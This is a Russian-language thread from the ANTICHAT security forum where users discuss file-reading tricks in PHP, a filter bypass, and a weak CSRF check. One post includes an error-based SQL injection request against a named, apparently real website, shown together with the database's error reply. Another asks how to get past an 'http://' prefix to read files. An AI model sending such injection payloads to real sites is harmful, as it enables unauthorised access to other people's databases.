ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.12.2019, 20:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
92829
Репутация:
212
|
|
Сообщение от trololoman96
trololoman96 said:
↑
это точно можно просто в параметр пихать и file_get_contents его поймет? ну создай файлик на хосте во всяком случае должен)
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
а еще скинь линк на таск, поковыряюсь тоже)
|
|
|
|
18.12.2019, 20:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Сообщение от Baskin-Robbins
Baskin-Robbins said:
↑
ну создай файлик на хосте
во всяком случае должен)
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
а еще скинь линк на таск, поковыряюсь тоже) Попробовал на виндовсе, апач, php 5.6.3 так же пишет что нет такого файла
Как добраться до читалки скинул в пм
|
|
|
|
18.12.2019, 20:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
92829
Репутация:
212
|
|
Сообщение от trololoman96
trololoman96 said:
↑
Попробовал на виндовсе, апач, php 5.6.3 так же пишет что нет такого файла
Как добраться до читалки скинул в пм ох уж этот виндовс)) на линь без вопросов, пых 7.3 тоже апач
|
|
|
|
18.12.2019, 21:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Сообщение от Baskin-Robbins
Baskin-Robbins said:
↑
ох уж этот виндовс)) на линь без вопросов, пых 7.3 тоже апач php 5.6.40 и php 7.3.6 на линуксе тоже не сработало, хз в чем дело
|
|
|
|
20.12.2019, 13:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
2154
Репутация:
0
|
|
|
|
|
|
20.12.2019, 15:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
96779
Репутация:
5
|
|
Да только толку мало, там фильтрует по длине потом и разрывает sel ect и fr om
Код:
Code:
Запрос
https://gexs.ru/brands/1_orange/?section_id=1+AND+extractvalue(1,concat(0x3a,((select+table_name+from+information_schema+tables+limit+1,1))))
Код:
Code:
Ответ
Mysql query error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ect table_name fr om information_schema tables limit 1,1))))))
|
|
|
|
23.12.2019, 10:05
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
hi everyone
can i bypass http:// prefix and use wrappers or read files?
Код:
Code:
file_get_contents('http://'.$_GET["s"]);
Код:
Code:
$url = 'http://'.$_GET["s"];
...
curl_setopt($handler, CURLOPT_URL, $url);
...
|
|
|
23.12.2019, 10:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от Napas
Napas said:
↑
can i bypass
http://
prefix and use wrappers or read files? nope
|
|
|
|
24.12.2019, 04:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
97114
Репутация:
24
|
|
|
|
|
|
24.12.2019, 05:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
7175
Репутация:
8
|
|
А что собственно непонятно? В данном случае CSRF токен сверял идентичность параметров в заголовке и в куках, если одинаково - значит всё как надо. Классика идёт ещё со времен "защитных" капч. Уважаю таких разработчиков.
Счастливой охоты на жуков.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
